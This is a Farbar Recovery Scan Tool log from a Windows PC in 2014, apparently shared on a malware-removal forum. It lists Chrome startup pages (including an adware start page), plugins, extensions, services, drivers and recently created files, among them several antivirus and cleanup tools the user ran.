CHR StartupUrls: Default -> "hxxp://www.google.com/", "hxxp://www.hao123.com/?tn=12092018_15_hao_pg", "hxxp://kl.startnow.com/?src=startpage&provider=&provider_name=yahoo&provider_code=&partner_id=693&product_id=876&affiliate_id=&channel=&toolbar_id=200&toolbar_version=2.5.0&install_country=US&install_date=20130505&user_guid=7D280CBB48134A63A7F3008BB7AF6F5A&machine_id=0a8e1d6372ad8a74ad749c75ac89af9c&browser=CR&os=win&os_version=6.0-x86-SP2"
CHR Plugin: (Remoting Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\36.0.1985.125\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\36.0.1985.125\pdf.dll ()
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\36.0.1985.125\gcswf32.dll No File
CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.0.66) - C:\Program Files\Java\jre7\bin\new_plugin\npdeploytk.dll (Sun Microsystems, Inc.)
CHR Plugin: (Java™ Platform SE 7) - C:\Program Files\Java\jre7\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.9) - C:\Program Files\QuickTime\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.9) - C:\Program Files\QuickTime\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.9) - C:\Program Files\QuickTime\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.9) - C:\Program Files\QuickTime\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.9) - C:\Program Files\QuickTime\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.9) - C:\Program Files\QuickTime\plugins\npqtplugin6.dll (Apple Inc.)
CHR Plugin: (Microsoft® Windows Media Player Firefox Plugin) - C:\Program Files\Windows Media Player\np-mswmp.dll No File
CHR Plugin: (Google Talk Plugin) - C:\Users\THINK\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
CHR Plugin: (Google Talk Plugin Video Accelerator) - C:\Users\THINK\AppData\Roaming\Mozilla\plugins\npgtpo3dautoplugin.dll No File
CHR Plugin: (Adobe Acrobat) - Q:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Thunder DapCtrl Plugin) - C:\Program Files\Common Files\Thunder Network\KanKan\npDapCtrlFirefox.2.0.5901.12.(358).dll (ShenZhen Thunder Networking Technologies Ltd.)
CHR Plugin: (PPLive PPTV Plugin) - C:\Program Files\Internet Explorer\PPLite\plugin\npplugin2.dll No File
CHR Plugin: (Silverlight Plug-In) - C:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll No File
CHR Plugin: (Microsoft Office Live Plug-in for Firefox) - C:\Program Files\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
CHR Plugin: (Google Update) - C:\Users\THINK\AppData\Local\Google\Update\1.3.21.79\npGoogleUpdate3.dll No File
CHR Plugin: (npalicdo plugin) - C:\Users\THINK\AppData\Roaming\alipay\cf\npalicdo.dll No File
CHR Plugin: (AliWangWang Plug-In For Firefox and Netscape) - Q:\Program Files\AliWangWang\7.00.07C\npwangwang.dll ( )
CHR Plugin: (Windows Presentation Foundation) - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
CHR Plugin: (Picasa) - q:\Program Files\Google\Picasa3\npPicasa3.dll (Google, Inc.)
CHR Plugin: (npQQPhotoDrawEx) - q:\Program Files\Tencent\Qzone\npQQPhotoDrawEx.dll ()
CHR Plugin: (QvodInsert) - q:\QvodPlayer\npQvodInsert.dll No File
CHR Plugin: (Default Plug-in) - default_plugin No File
CHR CustomProfile: C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (有道词典Chrome鼠标取词插件) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohddidmgooofkgohkbkaohadkolgejj [2011-12-15]
CHR Extension: (Socialyst) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\dijfedceenikakhbnmjblkajfidedfjd [2012-06-23]
CHR Extension: (Daum Equation Editor) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\dinfmiceliiomokeofbocegmacmagjhe [2012-07-09]
CHR Extension: (ZenMate) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2014-09-08]
CHR Extension: (AdBlock) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2013-11-10]
CHR Extension: (Thunder Download Extension for Chrome) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmbifdmobcbjlhplmlnbjbofnnoolink [2012-09-10]
CHR Extension: (Songstr - Search music everywhere) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\jcnkffbppdcibidkcjfgindlmekhaoep [2012-07-09]
CHR Extension: (Google 电子钱包) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-30]
CHR Extension: (单词圣手(Smart Word)) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\odhiddefamddbjhpaoagfkmgkkfhjnkd [2012-07-09]
CHR Extension: (Unblock Youku) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\pdnfnkhpgegpcingjbfihlkjeighnddk [2014-06-05]
CHR HKLM\...\Chrome\Extension: [aohddidmgooofkgohkbkaohadkolgejj] - Q:\Program Files\Youdao\Dict4\YDChromeTextExtractor.crx [2011-08-28]
CHR HKLM\...\Chrome\Extension: [hmbifdmobcbjlhplmlnbjbofnnoolink] - Q:\Program Files\Thunder Network\Thunder\BHO\xl_plugin_chrome.crx [2013-12-29]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 360rp; Q:\Program Files\360\360sd\360rps.exe [251208 2014-05-27] (360.cn)
S4 ADMonitor; C:\Windows\system32\ADMonitor.exe [106496 2009-03-18] () [File not signed]
S3 Adobe LM Service; C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [68096 2009-09-13] () [File not signed]
S3 AdvancedSystemCareService7; Q:\Program Files\IObit\Advanced SystemCare 7\ASCService.exe [881952 2014-01-14] (IObit)
S2 AntiVirMailService; C:\Program Files\Avira\AntiVir Desktop\avmailc.exe [802384 2014-07-23] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files\Avira\AntiVir Desktop\sched.exe [430160 2014-07-23] (Avira Operations GmbH & Co. KG)
S2 AntiVirService; C:\Program Files\Avira\AntiVir Desktop\avguard.exe [430160 2014-07-23] (Avira Operations GmbH & Co. KG)
R2 AntiVirWebService; C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE [1021008 2014-07-23] (Avira Operations GmbH & Co. KG)
R2 Conew Rescue Service; q:\Program Files\Keniu\ConewRsc\conewrsc.exe [140696 2010-10-20] ()
S4 DGPNPSEV; q:\Program Files\MyDrivers\DriverGenius2012\DgService.exe [52664 2012-08-16] (MyDrivers.com)
S2 dtsvc; C:\Windows\system32\DTS.exe [98304 2009-03-18] () [File not signed]
S4 HPSupportSolutionsFrameworkService; C:\Program Files\Hp\Common\HPSupportSolutionsFrameworkService.exe [72992 2014-07-07] (Hewlett-Packard Company)
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
S3 ImeDictUpdateServiceWR; C:\Program Files\Common Files\Microsoft Shared\IME14WR\SHARED\IMEDICTUPDATE.EXE [60208 2010-02-01] (Microsoft Corporation)
R2 IMFservice; C:\Program Files\IObit\IObit Malware Fighter\IMFsrv.exe [342336 2014-05-15] (IObit)
S2 LiveUpdateSvc; C:\Program Files\IObit\LiveUpdate\LiveUpdate.exe [2152736 2014-05-04] (IObit)
R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation)
S4 MDM; C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
S3 NitroReaderDriverReadSpool; C:\Program Files\Nitro PDF\Reader\NitroPDFReaderDriverService.exe [196912 2011-01-14] (Nitro PDF Software)
R2 OODefragAgent; C:\Program Files\OO Software\Defrag\oodag.exe [2398536 2011-01-12] (O&O Software GmbH)
R2 Pharos Systems ComTaskMaster; C:\Program Files\PharosSystems\Core\CTskMstr.exe [345600 2009-12-08] (Pharos Systems International) [File not signed]
S4 PnkBstrA; C:\Windows\system32\PnkBstrA.exe [66872 2009-10-05] ()
S3 ServiceLayer; C:\Program Files\PC Connectivity Solution\ServiceLayer.exe [657408 2009-10-26] (Nokia) [File not signed]
S3 SUService; C:\Program Files\Lenovo\System Update\SUService.exe [28672 2009-06-11] (Lenovo Group Limited) [File not signed]
R2 TSSCoreService; C:\Program Files\Lenovo\Client Security Solution\tvttcsd.exe [779576 2008-06-13] (Lenovo)
R2 TVT Backup Protection Service; C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe [1118208 2010-12-10] () [File not signed]
R2 TVT Backup Service; C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe [1425408 2010-12-10] (Lenovo Group Limited) [File not signed]
R2 TVT Scheduler; c:\Program Files\Common Files\Lenovo\Scheduler\tvtsched.exe [1171456 2010-12-10] (Lenovo Group Limited) [File not signed]
S4 UNS; C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2058776 2008-05-29] (Intel Corporation)
S3 XLServicePlatform; C:\Program Files\Common Files\Thunder Network\ServicePlatform\XLSP.dll [174024 2013-12-29] (深圳市迅雷网络技术有限公司)
S3 PPTVService; C:\windows\system32\PPTVSvc.dll [X]
S3 RoxMediaDB10; "C:\Program Files\Common Files\Roxio Shared\10.0\SharedCOM\RoxMediaDB10.exe" [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 360AvFlt; C:\windows\System32\DRIVERS\360AvFlt.sys [65608 2014-04-22] (360.cn)
R3 Afc; C:\windows\System32\drivers\Afc.sys [18688 2006-11-10] (Arcsoft, Inc.)
S3 Alidevice; C:\windows\system32\Drivers\Alidevice.sys [6656 2010-07-01] (alipay.com) [File not signed]
R2 avgntflt; C:\windows\System32\DRIVERS\avgntflt.sys [97648 2014-07-14] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\windows\System32\DRIVERS\avipbb.sys [136216 2014-06-03] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\windows\System32\DRIVERS\avkmgr.sys [37352 2013-12-12] (Avira Operations GmbH & Co. KG)
R1 BAPIDRV; C:\windows\System32\DRIVERS\BAPIDRV.sys [165960 2014-06-12] (360.cn)
R0 BC; C:\windows\System32\Drivers\BC.sys [24472 2010-10-21] (Kingsoft Corporation)
R3 Btcsrusb; C:\windows\System32\Drivers\btcusb.sys [36616 2010-06-24] (IVT Corporation.)
S3 bthav; C:\windows\System32\drivers\bthav.sys [34816 2008-07-10] (CSR, plc)
R1 DVDHelp; C:\windows\System32\drivers\DVDHelp.sys [25624 2011-02-04] ()
S4 FileMonitor; C:\Program Files\IObit\IObit Malware Fighter\Drivers\wlh_x86\FileMonitor.sys [21480 2013-03-23] (IObit)
R3 intelkmd; C:\windows\System32\DRIVERS\igdpmd32.sys [4747776 2009-12-10] (Intel Corporation)
S3 krpr; C:\windows\system32\Drivers\krpr.sys [48536 2010-10-21] (Kingsoft Corporation)
S3 ksaud; C:\windows\System32\drivers\ksaud.sys [1230976 2010-04-08] (Creative Technology Ltd.)
R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [23256 2014-05-12] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [110296 2014-09-15] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [51928 2014-05-12] (Malwarebytes Corporation)
S3 Ndisrd; C:\windows\System32\DRIVERS\ndisrd.sys [22016 2011-04-30] (NT Kernel Resources)
R3 NdisrdMP; C:\windows\System32\DRIVERS\ndisrd.sys [22016 2011-04-30] (NT Kernel Resources)
R3 NETwNv32; C:\windows\System32\DRIVERS\NETwNv32.sys [7341568 2011-08-03] (Intel Corporation)
S3 p2pfilter; Q:\Program Files\p2pover\p2pfilter.sys [4524 2005-05-10] () [File not signed]
S3 PCASp50; C:\windows\System32\Drivers\PCASp50.sys [35256 2009-12-24] (Printing Communications Assoc., Inc. (PCAUSA))
R1 ProtectorA; C:\windows\System32\drivers\ProtectorA.sys [15240 2009-11-26] (www.ISRA.org.cn)
R1 QQProtect; C:\windows\system32\drivers\QQProtect.sys [215096 2014-05-05] (Tencent)
R3 rasuw; C:\windows\System32\DRIVERS\rasuw.sys [33280 2009-10-12] (The UW Driver Project) [File not signed]
R3 RegFilter; C:\Program Files\IObit\IObit Malware Fighter\drivers\wlh_x86\regfilter.sys [32288 2013-11-19] (IObit.com)
R2 risdptsk; C:\windows\System32\DRIVERS\risdptsk.sys [46592 2009-09-22] (REDC) [File not signed]
R3 SNP2UVC; C:\windows\System32\DRIVERS\snp2uvc.sys [1754368 2008-11-25] ()
R0 sptd; C:\windows\System32\Drivers\sptd.sys [691696 2013-08-08] () [File not signed]
R1 ssmdrv; C:\windows\System32\DRIVERS\ssmdrv.sys [28520 2012-12-15] (Avira GmbH)
R1 Su1xDriver; C:\Windows\system32\DRIVERS\Su1xDriver.sys [6144 2009-12-14] (Ruijie) [File not signed]
R1 TPPWRIF; C:\windows\System32\drivers\Tppwr32v.sys [12080 2008-07-28] ()
S3 Tq_91Assistant; Q:\Program Files\NetDragon\91 Mobile\iPhone\Tq_91Assistant.sys [15784 2012-09-19] ()
R2 tvtfilter; C:\windows\System32\DRIVERS\tvtfilter.sys [33536 2012-02-26] (Lenovo) [File not signed]
S3 UrlFilter; C:\Program Files\IObit\IObit Malware Fighter\drivers\wlh_x86\UrlFilter.sys [20944 2013-11-19] (IObit.com)
S3 USBAAPL; C:\windows\System32\Drivers\usbaapl.sys [43520 2012-04-25] (Apple, Inc.) [File not signed]
R2 YLMFVDISK; C:\windows\System32\drivers\VirtDisk.sys [23768 2011-12-09] ()
R2 {1BA31E5A-C098-42d8-8F88-3C9F78A2FDDC}; q:\Program Files\CyberLink\PowerDVD10\PowerDVD10\NavFilter\000.fcl [87536 2010-03-13] (CyberLink Corp.)
U3 appbss9f; C:\windows\system32\Drivers\appbss9f.sys [0 ] (Microsoft Corporation)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 massfilter; system32\drivers\massfilter.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S1 Packet; system32\DRIVERS\ProtoDrv.sys [X]
S3 Passthru; system32\DRIVERS\Immunity.sys [X]
S3 PcdrNdisuio; system32\DRIVERS\pcdrndisuio.sys [X]
S3 TcHardWare; \??\C:\Program Files\Tencent\QQPCMgr\5.2.1511.201\QQPCHW.sys [X]
S3 tcphoc; \??\Q:\Program Files\Thunder Network\Thunder\XLDoctor\7.2.0.3062_5\Program\tcphoc.sys [X]
S3 xAntiArp; system32\DRIVERS\xAntiArp.sys [X]
S3 zgdccat; system32\DRIVERS\zgdccat.sys [X]
S3 zgdccdiag; system32\DRIVERS\zgdccdiag.sys [X]
S3 zgdccmdm; system32\DRIVERS\zgdccmdm.sys [X]
S3 zgdccnmea; system32\DRIVERS\zgdccnmea.sys [X]
S3 zgdccvousb; system32\DRIVERS\zgdccvousb.sys [X]
U3 atytwtun; No ImagePath
U3 mbr; \??\C:\Users\THINK\AppData\Local\Temp\mbr.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-15 17:13 - 2014-09-15 17:14 - 00035813 _____ () C:\Users\THINK\Desktop\FRST.txt
2014-09-15 17:13 - 2014-09-15 17:13 - 01097728 _____ (Farbar) C:\Users\THINK\Desktop\FRST (1).exe
2014-09-15 13:36 - 2014-09-15 13:36 - 00688992 ____R (Swearware) C:\Users\THINK\Desktop\dds.com
2014-09-15 12:12 - 2014-09-15 12:16 - 00002514 _____ () C:\Users\THINK\Desktop\Rkill.txt
2014-09-15 12:12 - 2014-09-15 12:12 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\THINK\Desktop\rkill.exe
2014-09-15 00:29 - 2014-09-15 00:29 - 00000000 ____D () C:\Program Files\ESET
2014-09-15 00:28 - 2014-09-15 00:28 - 02347384 _____ (ESET) C:\Users\THINK\Desktop\esetsmartinstaller_enu.exe
2014-09-15 00:01 - 2014-09-15 00:01 - 00000532 _____ () C:\windows\PFRO.log
2014-09-14 23:27 - 2014-09-14 23:28 - 00000000 ____D () C:\ProgramData\MFAData
2014-09-14 23:27 - 2014-09-14 23:27 - 00000000 ____D () C:\Users\THINK\AppData\Local\MFAData
2014-09-14 23:27 - 2014-09-14 23:27 - 00000000 ____D () C:\Users\THINK\AppData\Local\Avg2015
2014-09-14 23:27 - 2014-09-14 23:27 - 00000000 ____D () C:\Users\THINK\AppData\Local\Avg2014
2014-09-14 23:24 - 2014-09-14 23:25 - 04927216 _____ (AVG Technologies) C:\Users\THINK\Desktop\avg_free_stb_all_2014_4765.exe
2014-09-14 22:55 - 2014-05-18 08:00 - 00000000 ____D () C:\Users\THINK\Desktop\[140521]TVアニメ「一週間フレンズ。」EDテーマ「奏 (かなで)」/藤宮香織(CV.雨宮天)[320K+BK]
2014-09-14 22:20 - 2014-09-14 22:20 - 00000976 _____ () C:\Users\Public\Desktop\IObit Malware Fighter.lnk
2014-09-14 22:20 - 2014-09-14 22:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2014-09-14 22:02 - 2014-09-14 22:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\木马清除专家 2014
2014-09-14 22:00 - 2014-09-14 22:01 - 13221712 _____ () C:\Users\THINK\Desktop\avt_setup.exe
2014-09-14 19:59 - 2014-09-14 19:59 - 00000049 _____ () C:\Users\THINK\AppData\Roaming\pk.ini
2014-09-14 19:59 - 2014-09-14 19:59 - 00000000 ____D () C:\Users\THINK\Desktop\顽固木马克星
2014-09-14 19:55 - 2014-09-14 19:56 - 04838816 _____ () C:\Users\THINK\Desktop\TrojanKill.exe
2014-09-14 19:52 - 2014-09-14 19:59 - 24403519 _____ () C:\Users\THINK\Desktop\360compkill5.1.0.1102-0905.zip
2014-09-14 17:20 - 2014-09-15 16:55 - 00110296 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-14 17:19 - 2014-09-14 17:19 - 00000909 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-14 17:19 - 2014-09-14 17:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-14 17:19 - 2014-09-14 17:19 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-14 17:19 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-09-14 17:19 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-09-14 16:29 - 2014-09-14 16:29 - 00041256 _____ () C:\ComboFix.txt
2014-09-14 12:59 - 2011-06-26 02:45 - 00256000 _____ () C:\windows\PEV.exe
2014-09-14 12:59 - 2010-11-07 13:20 - 00208896 _____ () C:\windows\MBR.exe
2014-09-14 12:59 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\windows\NIRCMD.exe
2014-09-14 12:59 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\windows\SWREG.exe
2014-09-14 12:59 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\windows\SWSC.exe
2014-09-14 12:59 - 2000-08-30 20:00 - 00098816 _____ () C:\windows\sed.exe
2014-09-14 12:59 - 2000-08-30 20:00 - 00080412 _____ () C:\windows\grep.exe
2014-09-14 12:59 - 2000-08-30 20:00 - 00068096 _____ () C:\windows\zip.exe
2014-09-14 12:57 - 2014-09-14 16:30 - 00000000 ____D () C:\Qoobox
2014-09-14 12:57 - 2014-09-14 16:28 - 00000000 ____D () C:\windows\erdnt
2014-09-14 12:55 - 2014-09-14 12:55 - 05578360 ____R (Swearware) C:\Users\THINK\Desktop\ComboFix.exe
2014-09-14 12:49 - 2014-09-15 17:13 - 00000000 ____D () C:\FRST
2014-09-14 12:48 - 2014-09-14 12:48 - 01097728 _____ (Farbar) C:\Users\THINK\Desktop\FRST.exe
2014-09-14 12:25 - 2014-09-14 12:25 - 30856384 _____ (Microsoft Corporation) C:\Users\THINK\Desktop\Windows-KB890830-V5.16.exe
2014-09-14 12:24 - 2014-09-14 12:28 - 117624056 _____ (Microsoft Corporation) C:\Users\THINK\Desktop\msert.exe
2014-09-14 01:20 - 2014-09-14 01:20 - 00000000 ____D () C:\ProgramData\ksrbm
2014-09-13 23:58 - 2010-10-21 14:23 - 00048536 _____ (Kingsoft Corporation) C:\windows\system32\Drivers\krpr.sys
2014-09-13 23:57 - 2014-09-13 23:57 - 00000662 _____ () C:\Users\Public\Desktop\可牛急救箱.lnk
2014-09-13 23:57 - 2014-09-13 23:57 - 00000000 ____D () C:\Users\THINK\Desktop\可牛系统急救箱
2014-09-13 23:57 - 2014-09-13 23:57 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\可牛急救箱
2014-09-13 23:41 - 2014-09-13 23:42 - 00928768 _____ () C:\Users\THINK\Desktop\可牛系统急救箱_@106316@.exe
2014-09-13 22:54 - 2014-09-13 22:55 - 16578402 _____ ( ) C:\Users\THINK\Desktop\DLLSuite_Setup.exe
2014-09-12 19:10 - 2014-09-14 16:45 - 00000000 __SHD () C:\Users\THINK\AppData\Roaming\360Quarant
2014-09-12 19:05 - 2014-07-02 12:07 - 00358984 _____ (360.cn) C:\windows\system32\Drivers\Kemon.sys
2014-09-11 23:02 - 2014-09-11 23:04 - 00711168 _____ () C:\Users\THINK\Desktop\第七章_半导体的表面.ppt
2014-09-11 00:14 - 2014-09-11 00:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\墿崹僼儘儞僥傿傾
2014-09-10 23:45 - 2014-09-10 23:45 - 00000000 ____D () C:\Users\Public\SogouInput
2014-09-10 23:44 - 2014-09-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\搜狗拼音输入法
2014-09-10 23:44 - 2014-09-10 23:44 - 00000000 _____ () C:\windows\system32\nsyF3B8.tmp
2014-09-10 02:04 - 2014-09-10 02:04 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Foxit Software
2014-09-08 14:32 - 2014-09-08 14:32 - 00000000 ____D () C:\ProgramData\LocalStorage
2014-09-08 14:29 - 2014-09-13 23:51 - 00000000 ____D () C:\Users\THINK\Documents\QiyiVideoLibrary
2014-09-08 14:29 - 2014-09-08 14:29 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\IQIYI Video
2014-09-08 14:28 - 2014-09-08 14:29 - 00000000 ____D () C:\Users\Public\QiYi
2014-09-06 21:40 - 2014-09-06 21:40 - 00000000 ____D () C:\Users\THINK\Desktop\小毛
2014-09-06 19:55 - 2014-09-06 19:55 - 00000000 ____D () C:\Users\THINK\AppData\Local\thunder network
2014-09-01 06:33 - 2014-09-01 06:33 - 00016393 _____ () C:\windows\system32\hs_err_pid7548.log
2014-08-29 11:02 - 2014-08-29 11:02 - 00258932 _____ () C:\Users\THINK\Desktop\rephotos32ericson.zip
2014-08-26 21:49 - 2014-08-26 21:49 - 00002048 _____ (Microsoft Corporation) C:\windows\system32\tzres.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 02263552 _____ (Microsoft Corporation) C:\windows\system32\msi.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 01993728 _____ (Microsoft Corporation) C:\windows\system32\authui.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 00638400 _____ (Microsoft Corporation) C:\windows\system32\Drivers\dxgkrnl.sys
2014-08-26 21:48 - 2014-08-26 21:48 - 00332800 _____ (Microsoft Corporation) C:\windows\system32\msihnd.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 00082432 _____ (Microsoft Corporation) C:\windows\system32\consent.exe
2014-08-26 21:48 - 2014-08-26 21:48 - 00037376 _____ (Microsoft Corporation) C:\windows\system32\cdd.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 00033280 _____ (Microsoft Corporation) C:\windows\system32\appinfo.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 12356608 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 09739264 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 02382848 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-08-26 21:44 - 2014-08-26 21:44 - 01129472 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00607744 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00353792 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00223232 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00176640 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00073216 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00065536 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00041472 _____ (Microsoft Corporation) C:\windows\system32\msfeedsbs.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00011776 _____ (Microsoft Corporation) C:\windows\system32\mshta.exe
2014-08-26 21:44 - 2014-08-26 21:44 - 00010752 _____ (Microsoft Corporation) C:\windows\system32\msfeedssync.exe
2014-08-26 21:43 - 2014-08-26 21:43 - 01810432 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 01802240 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 01427968 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-08-26 21:43 - 2014-08-26 21:43 - 01137664 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 00717824 _____ (Microsoft Corporation) C:\windows\system32\jscript.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 00421376 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 00273408 _____ (Microsoft Corporation) C:\windows\system32\Drivers\afd.sys
2014-08-26 21:43 - 2014-08-26 21:43 - 00231936 _____ (Microsoft Corporation) C:\windows\system32\url.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 00142848 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe
2014-08-26 21:42 - 2014-08-26 21:42 - 02051072 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-08-26 21:42 - 2014-08-26 21:42 - 01401344 _____ (Microsoft Corporation) C:\windows\system32\msxml6.dll
2014-08-26 21:42 - 2014-08-26 21:42 - 01248768 _____ (Microsoft Corporation) C:\windows\system32\msxml3.dll
2014-08-26 21:42 - 2014-08-26 21:42 - 00506880 _____ (Microsoft Corporation) C:\windows\system32\qedit.dll
2014-08-26 21:41 - 2014-08-26 21:41 - 00915392 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tcpip.sys
2014-08-26 21:41 - 2014-08-26 21:41 - 00502784 _____ (Microsoft Corporation) C:\windows\system32\usp10.dll
2014-08-26 21:41 - 2014-08-26 21:41 - 00031232 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tcpipreg.sys
2014-08-26 21:40 - 2014-08-26 21:40 - 11587584 _____ (Microsoft Corporation) C:\windows\system32\shell32.dll
2014-08-26 21:40 - 2014-08-26 21:40 - 00894464 _____ (Microsoft Corporation) C:\windows\system32\kernel32.dll
2014-08-26 21:40 - 2014-08-26 21:40 - 00876032 _____ (Microsoft Corporation) C:\windows\system32\wer.dll
